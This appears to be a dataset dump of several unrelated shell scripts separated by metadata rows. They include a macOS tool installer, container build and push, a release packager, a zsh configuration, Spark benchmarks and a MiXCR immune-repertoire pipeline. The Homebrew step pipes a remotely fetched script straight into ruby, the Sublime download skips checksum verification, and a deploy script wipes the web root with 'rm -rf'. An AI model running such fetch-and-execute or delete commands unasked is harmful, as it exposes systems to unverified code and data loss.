  local download
  local download_dmg
  local hash
  local installer_path
  echo "${INFO}|||${NC} Installing GPG Tools..."
  #Get latest version of GPGTools from the GPGTools home page (work something more reliable out for this)
  # NOTE(review): both the version and the hash below are scraped from the
  # site's HTML with grep/awk -- fragile if the page layout changes.
  download="$(curl -s "https://gpgtools.org" | grep "version" | awk -F "/" '{ print $4 }')"
  download_dmg="GPG_Suite-${download}.dmg"
  if [ -f "${download_dmg}" ] ; then
    echo "${PASS}|||${NC} ALREADY DOWNLOADED"
    #Not needed as hash is calculated in if statement later
    #local download_hash="$(shasum -a 256 "${download_dmg}")"
  elif curl -o "${download_dmg}" "https://releases.gpgtools.org/${download_dmg}"; then
    echo "${PASS}|||${NC} DOWNLOADED"
  fi
  #Retrieve hash from gpgtools.org
  hash="$(curl -s "https://gpgtools.org/gpgsuite.html" | grep "SHA256" | awk -F ">" ' $5>0 { print substr($5,1,64) } ')"
  #Compare hashes of download to hash online
  # (prefix glob match: shasum output is "<hash>  <file>")
  if [[ "$(shasum -a 256 "$download_dmg")" = "$hash"* ]]; then
    echo "${PASS}|||${NC} Hash verified"
    installer_path="/Volumes/GPG Suite"
    if hdiutil attach -quiet "$download_dmg" ; then
      echo "${PASS}|||${NC} Mounted installer"
      #Find a way to check if script running as sudo instead of just printing this...
      if check_sudo_permission ; then
        echo "${WARN}|||${NC} Password may be required..."
      fi
      if sudo installer -pkg "${installer_path}/Install.pkg" -target "/" >/dev/null; then
        echo "${PASS}|||${NC} Installed GPG Tools"
      else
        echo "${FAIL}|||${NC} Failed to Install"
        exit 1
      fi
    else
      echo "${FAIL}|||${NC} Failed to mount .dmg"
      exit 1
    fi
    echo "${PASS}|||${NC} Completed Installation"
  else
    echo "${FAIL}|||${NC} Failed to verify hash"
    exit 1
  fi
  cleanup "$download_dmg" "$installer_path"
  exit 0
}
function install_sublime {
  # Download the latest Sublime Text .dmg scraped from sublimetext.com
  # (the site publishes no checksum, so none is verified), copy the app
  # bundle into /Applications and expose the bundled `subl` CLI as
  # /usr/local/bin/sublime.
  echo "${INFO}|||${NC} Installing Sublime Text..."
  local download_url
  local download_dmg
  if ! [ -d "/Applications/Sublime Text.app" ] ; then
    download_url="$(curl -s "https://www.sublimetext.com" | grep ".dmg" | awk -F '"' '{ print $4 }')"
    echo "$download_url"
    download_dmg="$(echo "$download_url" | awk -F "/" '{ print $4 }')"
    echo "$download_dmg"
    if ! [ -f "${download_dmg}" ] ; then
      #No need for shasum as there is none available on the website
      if curl -o "${download_dmg}" "${download_url}" ; then
        echo "${PASS}|||${NC} Downloaded ${download_dmg}"
      else
        echo "${FAIL}|||${NC} Download failed."
        exit 1
      fi
    else
      echo "${PASS}|||${NC} Already downloaded ${download_dmg}"
    fi
    if [ -f "${download_dmg}" ] ; then
      installer_path="/Volumes/Sublime Text"
      if hdiutil attach -quiet "$download_dmg" ; then
        echo "${PASS}|||${NC} Mounted installer"
        #Find a way to check if script running as sudo instead of just printing this...
        if check_sudo_permission ; then
          echo "${WARN}|||${NC} Password required to run as sudo"
        fi
        if sudo cp -r "${installer_path}/Sublime Text.app" "/Applications" ; then
          echo "${PASS}|||${NC} Installed Sublime Text"
        else
          echo "${FAIL}|||${NC} Failed to installed Sublime Text"
          exit 1
        fi
      else
        echo "${FAIL}|||${NC} Failed to mount .dmg"
        exit 1
      fi
      echo "${PASS}|||${NC} Completed Installation"
    else
      echo "${FAIL}|||${NC} Something went wrong. Installer is missing."
      exit 1
    fi
    # BUGFIX: the original wrapped the entire ln invocation in quotes, so
    # bash searched for a single command literally named
    # "ln -s /Applications/... sublime" and the symlink was never created.
    if ln -s "/Applications/Sublime Text.app/Contents/SharedSupport/bin/subl" /usr/local/bin/sublime ; then
      echo "${PASS}|||${NC} Symlinked Sublime to open from terminal!"
    else
      echo "${FAIL}|||${NC} Failed to symlink Sublime, so it won't open from terminal..."
    fi
    cleanup "$download_dmg" "$installer_path"
  else
    echo "${PASS}|||${NC} Sublime Text already installed"
  fi
  exit 0
}
function install_tower {
  # Download the latest Tower release .zip (link scraped from the release
  # notes page), unpack it and copy Tower.app into /Applications.
  # BUGFIX: the already-installed check used -f, but .app bundles are
  # directories, so the test was always false and Tower was re-downloaded
  # on every run; use -d like install_sublime does.
  if ! [ -d "/Applications/Tower.app" ] ; then
    download_url="$(curl -s "https://www.git-tower.com/release-notes/mac" | grep ".zip" | awk -F ".zip" ' { print $1 }' | awk -F '"' ' { print $NF } ')"
    download_url+=".zip"
    download_zip="$(echo "$download_url" | awk -F "/" ' { print $NF } ')"
    if curl -o "$download_zip" "$download_url" ; then
      echo "DOWNLOADED"
    else
      echo "FAILED"
      exit 1
    fi
    if unzip -q "$download_zip" -d "." ; then
      echo "Unzipped $download_zip"
      if check_sudo_permission ; then
        echo "${WARN}|||${NC} Password required to run as sudo"
      fi
      if sudo cp -r "Tower.app" "/Applications" ; then
        echo "Installed Tower in Applications!"
      else
        echo "Failed to copy to /Applications. Running as sudo?!"
        exit 1
      fi
    else
      echo "Failed to unzip."
      exit 1
    fi
  else
    echo "Tower is already installed!"
    exit 0
  fi
  # remove the unpacked bundle and the downloaded archive
  cleanup "Tower.app" "$download_zip"
  exit 0
}
function install_xcode {
  # Placeholder: Xcode installation is not implemented yet.
  printf '%s\n' "${INFO}|||${NC} Installing Xcode..."
  exit 0
}
function install_brew {
  # Install Homebrew if missing (otherwise update/upgrade), install
  # brew-file, install the packages listed in ./Brewfile, then register the
  # Homebrew bash in /etc/shells and make it the login shell.
  echo "${INFO}|||${NC} Installing Homebrew..."
  # BUGFIX: the original used `[[ "$(command -v brew)" > /dev/null ]]`;
  # inside [[ ]] the `>` is a lexicographic string comparison against
  # "/dev/null", not a redirection.  Test the exit status instead.
  if ! command -v brew > /dev/null ; then
    if /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" ; then
      echo "Homebrew installed!"
    else
      echo "Failed to installe Homebrew..."
      exit 1
    fi
  else
    echo "Homebrew already installed!"
    brew update
    brew upgrade
  fi
  if ! command -v brew-file > /dev/null ; then
    echo "Installing brew-file"
    if brew install rcmdnk/file/brew-file ; then
      echo "brew-file installed"
    else
      echo "Failed to install brew-file"
      exit 1
    fi
  else
    echo "brew-file already installed"
  fi
  #At a later date, this will be changed to either be assigned from the command line or by default this repo path
  local brewFile="./Brewfile"
  if check_sudo_permission ; then
    echo "${WARN}|||${NC} Password required to run as sudo"
  fi
  if brew file install -f "${brewFile}" ; then
    echo "${PASS}|||${NC} Packages from Brewfile installed!"
  else
    echo "${FAIL}|||${NC} Packages failed to install"
    exit 1
  fi
  if check_sudo_permission ; then
    echo "${WARN}|||${NC} Password required to run as sudo"
  fi
  # Update Bash after install through homebrew
  #https://johndjameson.com/blog/updating-your-shell-with-homebrew/
  # Run following as Sudo user
  # https://unix.stackexchange.com/a/269080
  if sudo bash -c "echo /usr/local/bin/bash >> /etc/shells" ; then
    #Change shell to new bash
    if chsh -s /usr/local/bin/bash ; then
      echo "${PASS}|||${NC} Shell changed to Bash from homebrew"
    else
      echo "${FAIL}|||${NC} Failed to change shell to new Bash"
      exit 1
    fi
  fi
  exit 0
}
function install_dotfiles {
  # Placeholder: dotfiles installation is not implemented yet.
  printf '%s\n' "${INFO}|||${NC} Installing dotfiles..."
  exit 0
}
function install_all {
  # Run the audit and then every installer in sequence.
  # NOTE(review): every function called below ends with `exit 0`, so in
  # practice only audit_macOS ever runs and the script exits right after
  # it -- confirm whether the callees should `return` instead of `exit`.
  echo "${INFO}|||${NC} Installing everything ❤️ ..."
  audit_macOS
  install_dotfiles
  install_xcode
  install_brew
  install_gpg
  install_tower
  install_bailiff
  customise_defaults
  exit 0
}
function main {
  # Dispatch the first CLI argument to the matching action; with no
  # arguments, fall through to the usage text.  When an argument was
  # given, verify internet connectivity first (most actions download).
  local var=${1:-"usage"}
  if [ "$#" -ne 0 ] ; then
    #No point checking connection if no args passed
    echo "${INFO}|||${NC} Checking internet connection!"
    if ping -c 4 8.8.8.8 | grep 'No route' ; then
      echo "${FAIL}|||${NC} No internet connection. Exiting..."
      exit 1
    else
      echo "${PASS}|||${NC} Internet connected"
    fi
  fi
  case "${var}" in
    audit)     audit_macOS ;;
    customise) customise_defaults ;;
    bailiff)   install_bailiff ;;
    gpgtools)  install_gpg ;;
    sublime)   install_sublime ;;
    tower)     install_tower ;;
    xcode)     install_xcode ;;
    brew)      install_brew ;;
    dotfiles)  install_dotfiles ;;
    all)       install_all ;;
    *)         usage ;;
  esac
  cleanup
}
main "$@"
#TODO:
# - Install BlockBlock, Lulu, Do Not Disturb and What's Your Sign Applications
# List above may change, recently started using them so who knows...
| true |
7a7106e3853c5cb512a3c49ed0a218a6d889e193 | Shell | uint0/aws-mysfits-all-in-one | /scripts/build_container.sh | UTF-8 | 688 | 3.15625 | 3 | [] | no_license | #!/bin/sh
set -e
# Build the mythicalmysfits service image and push it to this account's
# ECR registry in the currently configured region.
mm_aws_accountid=$(aws sts get-caller-identity --query Account --output text)
mm_aws_region=$(aws configure get region)
mm_container_name="mythicalmysfits/service"
mm_ecr_url=$mm_aws_accountid.dkr.ecr.$mm_aws_region.amazonaws.com
echo "(1/4) Building Container"
# Expansions are quoted so unexpected values cannot word-split (SC2086);
# the app directory is resolved relative to this script's location.
docker build -t "$mm_container_name" "$(dirname "$0")/../assets/app"
echo "(2/4) Tagging Container"
docker tag "$mm_container_name:latest" "$mm_ecr_url/$mm_container_name:latest"
echo "(3/4) Logging in to ecr"
aws ecr get-login-password --region "$mm_aws_region" | docker login --username AWS --password-stdin "$mm_ecr_url"
echo "(4/4) Pushing container"
docker push "$mm_ecr_url/$mm_container_name:latest"
echo "Done" | true |
a803046a97c3efe365d135eabe0fd1eb7a393588 | Shell | kergoth/dotfiles | /semi-external/scripts/sherlock | UTF-8 | 196 | 2.515625 | 3 | [] | no_license | #!/bin/sh
set -eu
# Fetch (or reuse) the sherlock checkout via git-get, set up its pipenv
# environment on first use, and forward all arguments to sherlock.py.
cd "$(git-get https://github.com/sherlock-project/sherlock 2>/dev/null)"
if [ ! -e Pipfile.lock ]; then
    pipenv install -r requirements.txt
fi
pipenv run ./sherlock.py "$@"
| true |
e16fd75cd485a81b67ccb64e00066563ac676d1c | Shell | mej571/MCTF-video-coding | /src/mctf.sh | UTF-8 | 715 | 3.265625 | 3 | [] | no_license | #! /bin/bash
## Add a final symbol.
# Print a blank line to stderr and terminate the script.
function end {
(echo -e "" >&2)
# (echo -n "[1;0m" >&2)
exit
}
# (echo -en "[0;32m" >&2)
# No arguments: show a help banner plus the commands available under
# $MCTF/bin, then exit via end().
if [ -z "$*" ]; then
(echo -e "" >&2)
(echo -e "+-------------+" >&2)
(echo -e "| MCTF parser |" >&2)
(echo -e "+-------------+" >&2)
(echo -e "" >&2)
(echo -e MCTF=\"$MCTF\" >&2)
(echo -e "" >&2)
(echo -e "Available commands:" >&2)
(echo -e "" >&2)
ls $MCTF/bin
(echo -e "" >&2)
(echo -e "Type: \n\n  mctf command --help \n\nto get information about the command line parameters" >&2)
end
fi
# Dispatch: "$MCTF/bin/$@" expands to "$MCTF/bin/<first arg>" followed by
# the remaining arguments, i.e. it runs the named sub-command with its
# parameters.  The command line is also appended to a local `trace` file.
(echo [`pwd`] "$MCTF/bin/$@" >&2)
echo "$MCTF/bin/$@" >> trace
#set -x
"$MCTF/bin/$@"
#set +x
exit $?
| true |
39a6d99aae38cf0f9247a4793c155a0577b2b8bb | Shell | tpruzina/ifj14 | /scripts/release.sh | UTF-8 | 1,230 | 3.046875 | 3 | [] | no_license | #!/bin/bash
# Build the IFJ submission archive <login>.zip and validate it with the
# course-provided is_it_ok.sh checker.  $1 = submitter's login name.
if [ $# -ne 1 ]; then
echo "supply login name as parameter" && exit 1
else
make || exit 1
echo "########## creating ${1}.zip"
#tar uklada veci vcetne cesty takze si vytvorime .tmp adresar
mkdir -p .tmp && cd .tmp || exit 1
# Copy the submitted files flat into .tmp so the zip contains no paths.
cp \
../rozdeleni \
../rozsireni \
../src/Makefile \
../src/ast.c \
../src/ast.h \
../src/defines.h \
../src/gc.c \
../src/gc.h \
../src/ial.c \
../src/ial.h \
../src/interpret.c \
../src/interpret.h \
../src/log.c \
../src/log.h \
../src/main_interpret.c \
../src/parser.c \
../src/parser.h \
../src/scanner.c \
../src/scanner.h \
../src/stack.c \
../src/stack.h \
../src/string.c \
../src/string.h \
../src/structs.h \
../docs/dokumentace/dokumentace.pdf \
. || exit 1
echo "########## building && testing #########"
# Smoke-build from the flattened copy to ensure the archive is buildable.
make || exit 1
make clean || exit 1
echo "########## build successful ############"
echo "########## creating archive ############"
zip ../${1}.zip * || exit 1
cd .. && rm -r .tmp
echo "########## created ################"
echo "######### running is_it_ok.sh #####"
bash scripts/is_it_ok.sh ${1}.zip .tmp2 || exit 1
rm -rf .tmp2
echo "######### is_it_ok DONE ###########"
fi
| true |
2d5bf3e04d3a0e34a3567c40d38d5c55449b18ee | Shell | cleka/colossus-titan | /Colossus/bin/runinternal | UTF-8 | 640 | 3.171875 | 3 | [] | no_license | #! /bin/sh
#
# A simple wrapper to run a bunch of games inside the same JVM
# Can run each game from scratch, or all of them from the same
# savegame file.
#
# Usage: runinternal [rounds] [savegame]
IROUNDS=5
if [ $# -gt 0 ]
then
IROUNDS=$1
shift
fi
echo "Starting Colossus to run internally $IROUNDS games."
if [ $# -gt 0 ]
then
FILE=$1
echo "Games will start from savegame $FILE."
shift
LOADOPTION=" --load $FILE "
fi
# NOTE: $LOADOPTION is intentionally left unquoted so it word-splits into
# the two arguments "--load <file>" (or vanishes when no savegame given).
java -Djava.util.logging.config.file=logging.properties -Dnet.sf.colossus.stressTestRounds=$IROUNDS -Dnet.sf.colossus.forceViewBoard=true -Dnet.sf.colossus.endAfterFirstBattle=true -Xmx256M -jar Colossus.jar -gS -q -A $LOADOPTION
# EOF
| true |
f34b158ec2c098da2ee42d791e01fc35d992e6b6 | Shell | ozel/batchpix | /batchpixel.sh | UTF-8 | 1,282 | 3.140625 | 3 | [] | no_license | #!/bin/sh
abort=0;
#echo -n "Checking FTDI Drivers..."
#if [ -f "/usr/local/lib/libftd2xx.so" ] && [ -f "/usr/lib/libftd2xx.so" ] && [ -f "/usr/local/lib/libftd2xx.so.1.1.12" ]; then
#echo " OK.";
#else
#echo " NOT FOUND!";
#echo -n "Installing FTDI Drivers (requires root permissions)...";
#sudo cp _other_/drivers/libftd2xx.so.1.1.12 /usr/local/lib/libftd2xx.so.1.1.12
#sudo ln -s /usr/local/lib/libftd2xx.so.1.1.12 /usr/local/lib/libftd2xx.so
#sudo ln -s /usr/local/lib/libftd2xx.so.1.1.12 /usr/lib/libftd2xx.so
#echo " OK.\n"
#abort=1;
#fi
#echo -n "Checking FTDI Drivers permissions..."
#if [ -f "/etc/udev/rules.d/pixelman.rules" ]; then
# echo " OK.";
#else
# echo " NOT FOUND!";
# echo -n "Setting permissions (requires root permissions)...";
# sudo cp _other_/drivers/pixelman.rules /etc/udev/rules.d/
# echo " OK.\n"
# abort=1;
#fi
#if [ $abort -eq 1 ]; then
# echo "Please disconnect and reconnect the devices and start Pixelman again.\n"
# exit 0;
#fi
#FTDISIO_PRESENT=`lsmod | grep ftdi_sio`
#if [ -n "$FTDISIO_PRESENT" ]; then
# echo "In order to use Fitpix/USB devices the ftdi_sio driver has to be temporalily removed. This will require root permissions..."
# sudo rmmod ftdi_sio
#fi
# Make the bundled shared libraries resolvable, then launch the binary.
export LD_LIBRARY_PATH=.:$LD_LIBRARY_PATH
# Quote the argument so paths containing spaces reach the binary intact
# (SC2086); the original unquoted $1 would word-split them.
./batchpixel.exe "$1"
| true |
0f5e753b2edf63dc60aa65bb4772c41df8d73a4e | Shell | curranjm/umbalgo | /deploy.sh | UTF-8 | 580 | 3.09375 | 3 | [] | no_license | #!/usr/bin/env bash
set -v
# Deploy the site: run every src/algo script through the parser, transpile
# the ES sources with babel, and copy static assets into the web root.
WD=$(pwd)
PARSE="${WD}/tools/parser.py"
IN="${WD}/src/algo"
OUT=/var/www/html/
# ${OUT:?} aborts instead of expanding to "/*" should OUT ever be emptied.
rm -rf "${OUT:?}"/*
mkdir -p "${OUT}/js/algo"
pushd .
cd "${IN}"
for f in *.js
do
  "${PARSE}" "$f" "${OUT}/js/algo/$f"
done
popd
pushd .
cd src
../node_modules/.bin/babel -d "${OUT}/js/libs" libs
../node_modules/.bin/babel -d "${OUT}/js/content" content
popd
cp src/html/*.html "${OUT}"
mkdir -p "${OUT}/css"
cp src/css/*.css "${OUT}/css"
cp -r d3/vizlib "${OUT}/js/libs"
mkdir -p "${OUT}/images"
cp src/images/*.svg "${OUT}/images"
cp src/images/*.ico "${OUT}/images"
cp src/images/*.png "${OUT}/images"
| true |
a889855d08c4024ce6cde14e70cde429c39c2eb8 | Shell | cwru-robotics/turtlebot-estimation | /scripts/setupEnvironment | UTF-8 | 585 | 2.59375 | 3 | [] | no_license | #!/bin/bash
# Prepare a shell for Xilinx/Zynq cross-compilation: source the Vivado and
# SDK environments and put dtc plus the u-boot tools on PATH.
scripts_dir="$HOME/thesis/scripts"
xilinx_install_dir="$HOME/Applications/Xilinx"
dtc_install_dir="$HOME/thesis/xlnx_sources/dtc"
u_boot_install_dir="$HOME/thesis/xlnx_sources/u-boot-xlnx"
# Paths derived from $HOME are quoted so directories with spaces work.
source "$xilinx_install_dir/Vivado/2016.1/settings64.sh"
source "$xilinx_install_dir/SDK/2016.1/settings64.sh"
export CROSS_COMPILE=arm-xilinx-linux-gnueabi-
export ARCH=arm
export UIMAGE_LOADADDR=0x8000	# For xilinx kernel
export LOADADDR=0x8000		# For ADI kernel
cd "$dtc_install_dir" && export PATH="$(pwd):$PATH"
cd "$u_boot_install_dir/tools" && export PATH="$(pwd):$PATH"
cd "$scripts_dir"
| true |
904b7d57cc0816c331e746266ebf9777c655c1b1 | Shell | paragsahu/brigde-labz-assignment | /Day-5,6/headtail.sh | UTF-8 | 113 | 2.9375 | 3 | [] | no_license | #!/bin/bash -x
# Simulate a coin toss: x is 0 or 1; report TAILS for 0, HEAD otherwise.
x=$((RANDOM % 2))
if (( x > 0 )); then
    echo "$x It's HEAD"
else
    echo "$x It's TAILS"
fi
| true |
e0d4fa698f574c28941d0a19766d111bb37dd751 | Shell | carze/vappio | /vappio-scripts/vp-checkandterminate-cluster | UTF-8 | 335 | 2.859375 | 3 | [] | no_license | #!/bin/bash
#USAGE: vp-checkandterminate-cluster true mycluster
#Terminate cluster
if [ "$1" == "1" ] || [ "$1" == "true" ]
then
if [ "$2" == "local" ]
then
vp-terminate-cluster --cluster=$2 --auth-token=`generateAuthToken.py /mnt/keys/devel1.pem.pub`
else
vp-terminate-cluster --cluster=$2
fi
fi
| true |
31efd1242f4cc913dc13a6dc6bfac4c02553db61 | Shell | cmantas/asap.cslab | /experiments/spark_kmeans_text.sh | UTF-8 | 3,326 | 3.265625 | 3 | [] | no_license | #!/bin/bash
source $(dirname $0)/config.info #loads the parameters
source $(dirname $0)/common.sh #loads the common functions
output_file="spark_kmeans_text.out"
input_dir=~/Data/ElasticSearch_text_docs
TOOLS_JAR=~/bin/lib/asapTools.jar
#create HDFS files
hadoop_input=/user/$USER/input/kmeans_text_seqfiles
hdfs dfs -rm -r $hadoop_input &>/dev/null
hdfs dfs -mkdir -p $hadoop_input &>/dev/null
spark_vectors=/tmp/spark_tfidf
moved_mahout=/tmp/moved_mahout; hdfs dfs -mkdir -p $moved_mahout
moved_arff=/tmp/moved_vectors.arff
spark_tfidf(){
docs=$1
minDF=$2
# TF/IDF
hdfs dfs -rm -r $spark_vectors &>/dev/null
echo -n "[EXPERIMENT] TF-IDF on $docs documents, minDF=$minDF: "
input_size=$(hdfs_size $hadoop_input)
asap run tfidf spark $hadoop_input $spark_vectors $minDF &> spark_tfidf.out
output_size=$(hdfs_size $spark_vectors)
check_spark spark_tfidf.out
dimensions=1048576
echo $dimensions features, $(peek_time) sec
asap report -e spark_tfidf -cm -m documents=$docs dimensions=$dimensions \
minDF=$minDF input_size=$input_size output_size=$output_size
}
spark_kmeans(){
input_size=$(hdfs_size $spark_vectors)
echo -n "[EXPERIMENT] spark K-means with K=$k: "
asap run kmeans spark $spark_vectors $k $max_iterations &> spark_kmeans.out
output_size=0
#check_spark spark_kmeans.out # IDK why this fails (OK is never printed)
rm -r /tmp/spark* 2>/dev/null
echo $(peek_time) sec
#DEBUG show any exceptions but igore them
cat spark_kmeans.out | grep Exception
asap report -e spark_kmeans_text -cm -m documents=$docs k=$k dimensions=$dimensions \
minDF=$minDF input_size=$input_size output_size=$output_size
}
spark2mahout(){
docs=$1
dimensions=$2
# Move spark to mahout
echo -n "[EXPERIMENT] Move Spark->Mahout on $docs documents "
asap run move spark2mahout $spark_vectors $moved_mahout &> spark2mahout.out
check spark2mahout.out
input_size=$(hdfs_size $spark_vectors)
output_size=$(hdfs_size $moved_mahout)
echo $(peek_time) sec
asap report -e spark2mahout -cm -m documents=$docs minDF=$minDF dimensions=$dimensions \
input_size=$input_size output_size=$output_size
}
spark2arff(){
docs=$1
dimensions=$2
# Move spark to arff
input_size=$(hdfs_size $spark_vectors)
echo -n "[EXPERIMENT] Move Spark->arff on $docs documents"
asap run move spark2arff $spark_vectors $moved_arff &> arff2spark.out
check arff2spark.out
output_size=$(size $moved_arff)
echo , $(peek_time) sec
asap report -e spark2arff -cm -m documents=$docs minDF=$minDF dimensions=$dimensions \
input_size=$input_size output_size=$output_size
}
for ((docs=min_documents; docs<=max_documents; docs+=documents_step)); do
#re-load the parameters on each iteration for live re-configuration
hdfs dfs -rm -r $hadoop_input &>/dev/null
echo "[PREP] Loading $docs text files"
asap run move dir2sequence $input_dir $hadoop_input $docs &> dir2sequence.out
check dir2sequence.out
#for (( minDF=max_minDF; minDF>=min_minDF; minDF-=minDF_step)); do
minDF=10
spark_tfidf $docs $minDF
spark2mahout $docs $dimensions
spark2arff $docs $dimensions
hdfs dfs -rm -r "/tmp/moved*" &>/dev/null
for((k=min_k; k<=max_k; k+=k_step)); do
spark_kmeans
done
#done
done
| true |
57a7146b0429e2b027f9b10cf0295f27937f1435 | Shell | nickali/configs | /zsh/zshrc | UTF-8 | 2,117 | 3 | 3 | [] | no_license |
export PATH="/usr/local/sbin:/usr/local/bin:$PATH"
# Enable Powerlevel10k instant prompt. Should stay close to the top of ~/.zshrc.
# Initialization code that may require console input (password prompts, [y/n]
# confirmations, etc.) must go above this block; everything else may go below.
if [[ -r "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh" ]]; then
source "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh"
fi
#export GEM_HOME=~/.gem
#export GEM_PATH=~/.gem
source $(brew --prefix)/share/antigen/antigen.zsh
antigen bundle zsh-users/zsh-completions
antigen bundle zsh-users/zsh-syntax-highlighting
antigen bundle zpm-zsh/title
antigen bundle gretzky/auto-color-ls
antigen theme romkatv/powerlevel10k
source $(dirname $(gem which colorls))/tab_complete.sh
antigen bundle urbainvaes/fzf-marks
antigen apply
eval "$(zoxide init zsh --cmd dir --hook prompt)"
alias lc='colorls -lA --sd'
alias ls='colorls --sd'
alias cat='bat'
alias less='bat'
alias more='bat'
#alias 'grep'='batgrep --color --pager=bat'
alias man='batman'
alias vim='nvim'
alias vi='nvim'
alias journal='vi $(echo ${(L)$(date +%B-%Y)}).md'
alias gitemacs='cd ~/WIP/config/dot-emacs-dot-d'
PROMPT_TITLE='$USER@$HOST:$PWD'
export W3M_IMG2SIXEL=/usr/local/bin/img2sixel
export PATH=/usr/local/opt/texinfo/bin:$PATH
function rg()
{
/usr/local/bin/rg -p "$@" | bat
}
function lazygit() {
git add .
git commit -a -m "$1"
git push
}
# To customize prompt, run `p10k configure` or edit ~/.p10k.zsh.
[[ ! -f ~/.p10k.zsh ]] || source ~/.p10k.zsh
alias icat="kitty +kitten icat"
[ -f ~/.fzf.zsh ] && source ~/.fzf.zsh
fh() {
eval $( ([ -n "$ZSH_NAME" ] && fc -l 1 || history) | fzf +s --tac | sed 's/ *[0-9]* *//')
}
fd() {
local dir
dir=$(find ${1:-.} -path '*/\.*' -prune \
-o -type d -print 2> /dev/null | fzf +m) &&
cd "$dir"
}
test -e "${HOME}/.iterm2_shell_integration.zsh" && source "${HOME}/.iterm2_shell_integration.zsh"
autoload -U +X bashcompinit && bashcompinit
complete -o nospace -C /usr/local/bin/terraform terraform
| true |
ac8bb414fe3b1e11ebe6aa08fc9e1b6006c5b549 | Shell | schu/habitat-demo-service | /plan.sh | UTF-8 | 377 | 2.78125 | 3 | [] | no_license | pkg_name=demo-service
pkg_origin=schu
pkg_version=0.10.0
pkg_description="Habitat demo service"
pkg_maintainer="schu"
pkg_deps=("core/glibc")
pkg_build_deps=("core/go" "core/make")
pkg_bin_dirs=("/usr/bin")
do_build() {
make
}
do_install() {
install -m 0755 -D "demo-service" "$pkg_prefix/usr/bin/demo-service"
install -m 0644 -D "message-default.txt" "$pkg_prefix/"
}
| true |
0d5661f92e678d58e1191c77ca1db33bc5c03661 | Shell | vorlock/a-config-mgmt | /bin/deploy-clusters.sh | UTF-8 | 511 | 2.640625 | 3 | [] | no_license | #!/bin/bash
for cname in aks eks gke; do
export KUBECONFIG=${HOME}/work/kpmg/multicloud/${cname}-kubectl.conf
#kubectl apply -f - <<EOF
cat > /tmp/dupa.${cname} <<EOF
apiVersion: configmanagement.gke.io/v1
kind: ConfigManagement
metadata:
name: config-management
spec:
# clusterName is required and must be unique among all managed clusters
clusterName: ${cname}-anthos-01
git:
syncRepo: https://github.com/vorlock/a-config-mgmt.git
syncBranch: master
secretType: none
EOF
done
| true |
170b11443584a2d88db5dc002a154722dac520e5 | Shell | Japrin/cancer | /repseq/run.MiXCR.sh | UTF-8 | 3,336 | 3.171875 | 3 | [] | no_license | #!/bin/bash
sDir=`dirname $0`
iniFile="$sDir/../parameter/init_human.sh"
optBam=false
while getopts b opt
do
case $opt in
b)
optBam=true
;;
'?')
echo "Usage: $0 invalid option -$OPTARG"
echo "Usage: $0 [-b bamfile] <outDir> <sampleID> <fq1> [fq2]"
exit 1
;;
esac
done
shift $((OPTIND-1))
if [ $# -lt 3 ]
then
echo "Usage: $0 [-b bamfile] <outDir> <sampleID> <fq1> [fq2]"
exit 1
fi
outDir=$1
sampleID=$2
fq1=$3
fq2=$4
optT=4
mkdir -p $outDir
source $iniFile
module load java/1.8.0_171
module load bamUtil/1.0.14
#mixcrBin="/Share/BP/zhenglt/01.bin/repSeq/mixcr-2.0.2/mixcr"
mixcrBin="/WPSnew/zhenglt/01.bin/repseq/mixcr/mixcr-2.1.11/mixcr"
optM=6
echo begin at: `date`
echo $optBam
if $optBam;then
max_reads=`echo 250000*$optM | bc`
echo java -Xmx${optM}g -jar $picardDIR/picard.jar SortSam I=$fq1 O=$outDir/$sampleID.sort.name.bam MAX_RECORDS_IN_RAM=$max_reads TMP_DIR=$outDir SO=queryname VALIDATION_STRINGENCY=SILENT
java -Xmx${optM}g -jar $picardDIR/picard.jar SortSam I=$fq1 O=$outDir/$sampleID.sort.name.bam MAX_RECORDS_IN_RAM=$max_reads TMP_DIR=$outDir SO=queryname VALIDATION_STRINGENCY=SILENT
### for STAR alignment
samtools view -F 0x100 $outDir/$sampleID.sort.name.bam | bam bam2FastQ --readName --in - --firstOut $outDir/$sampleID.forMiXCR.R1.fq.gz --secondOut $outDir/$sampleID.forMiXCR.R2.fq.gz
######bam bam2FastQ --readName --in $outDir/$sampleID.sort.name.bam --firstOut $outDir/$sampleID.forMiXCR.R1.fq.gz --secondOut $outDir/$sampleID.forMiXCR.R2.fq.gz
fq1=$outDir/$sampleID.forMiXCR.R1.fq.gz
fq2=$outDir/$sampleID.forMiXCR.R2.fq.gz
echo rm $outDir/$sampleID.sort.name.bam
rm $outDir/$sampleID.sort.name.bam
else
echo "nothing to do"
fi
echo fq1: $fq1
echo fq2: $fq2
$mixcrBin align -f -p rna-seq -OallowPartialAlignments=true --save-description --save-reads -t $optT \
-r $outDir/$sampleID.MiXCR.log.align.txt \
$fq1 $fq2 \
$outDir/$sampleID.MiXCR.alignments.vdjca
$mixcrBin assemblePartial -f -p \
-r $outDir/$sampleID.MiXCR.log.assemble.txt \
$outDir/$sampleID.MiXCR.alignments.vdjca \
$outDir/$sampleID.MiXCR.alignmentsRescued_1.vdjca
$mixcrBin assemblePartial -f -p \
-r $outDir/$sampleID.MiXCR.log.assemble.txt \
$outDir/$sampleID.MiXCR.alignmentsRescued_1.vdjca \
$outDir/$sampleID.MiXCR.alignmentsRescued_2.vdjca
$mixcrBin assemble -f -t $optT -OaddReadsCountOnClustering=true -ObadQualityThreshold=15 \
-r $outDir/$sampleID.MiXCR.log.assembleClones.txt \
$outDir/$sampleID.MiXCR.alignmentsRescued_2.vdjca \
$outDir/$sampleID.MiXCR.clones.clns
$mixcrBin exportClones -f --filter-out-of-frames --filter-stops $outDir/$sampleID.MiXCR.clones.clns $outDir/$sampleID.MiXCR.clones.txt
$mixcrBin exportClonesPretty $outDir/$sampleID.MiXCR.clones.clns $outDir/$sampleID.MiXCR.clonesPretty.txt
$mixcrBin exportClones -f --filter-out-of-frames --filter-stops --chains TCR $outDir/$sampleID.MiXCR.clones.clns $outDir/$sampleID.MiXCR.TCR.clones.txt
$mixcrBin exportClonesPretty --chains TCR $outDir/$sampleID.MiXCR.clones.clns $outDir/$sampleID.MiXCR.TCR.clonesPretty.txt
if $optBam;then
echo rm $fq1 $fq2
rm $fq1 $fq2
fi
$sDir/TCRasm.MiXCR.slim.pl \
-s $sampleID \
$outDir/$sampleID.MiXCR.TCR.clones.txt \
$outDir/$sampleID.MiXCR.TCR.clones.slim.txt
